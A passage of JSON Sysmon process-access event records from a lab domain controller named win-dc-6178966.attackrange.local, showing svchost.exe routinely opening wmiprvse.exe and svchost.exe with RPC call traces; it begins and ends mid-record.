ll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1039,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.330\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.330","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1040,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.330\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.330","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1041,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.330\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.330","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1042,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1043,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.393\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.393","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1044,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1045,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1046,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.909\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.909","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 